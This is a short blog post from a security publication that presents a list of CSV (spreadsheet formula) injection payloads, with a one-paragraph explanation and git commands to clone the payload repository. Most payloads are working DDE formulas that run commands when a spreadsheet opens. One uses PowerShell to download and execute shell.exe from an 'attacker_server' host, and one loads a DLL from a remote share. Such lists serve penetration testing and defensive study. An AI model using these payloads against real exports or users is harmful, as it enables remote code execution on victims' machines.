System Weakness

System Weakness is a publication that specialises in publishing upcoming writers in cybersecurity and ethical hacking space. Our security experts write to make the cyber universe more secure, one vulnerability at a time.

Follow publication

Member-only story

CSV Injection Payload List

Ismail Tasdelen
System Weakness
Published in
2 min readJun 29, 2020

--

Screenshot on CSV Injection Attack

CSV injection is a type of cyber attack in which an attacker attempts to inject malicious data into a CSV file. This can happen if the application that processes the CSV file does not properly validate the input, allowing the attacker to insert arbitrary content into the file. The attacker may then be able to manipulate the data in the file, potentially leading to security breaches or other problems. To prevent CSV injection attacks, it is important to always validate user input and ensure that it is free from any malicious content before processing it. This can be done using a variety of techniques, such as input sanitization and filtering.

Payloads :

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

Sources to be read :

Examples from the real world :

References :

CSV Injection :

Cloning an Existing Repository ( Clone with HTTPS )

root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git

Cloning an Existing Repository ( Clone with SSH )

root@ismailtasdelen:~# git clone git@github.com:payloadbox/csv-injection-payloads.git

GitHub : https://github.com/payloadbox/csv-injection-payloads

--

--

Published in System Weakness

System Weakness is a publication that specialises in publishing upcoming writers in cybersecurity and ethical hacking space. Our security experts write to make the cyber universe more secure, one vulnerability at a time.

Written by Ismail Tasdelen

I'm Ismail Tasdelen. I have been working in the cyber security industry for +7 years. Don't forget to follow and applaud to support my content.

No responses yet

Write a response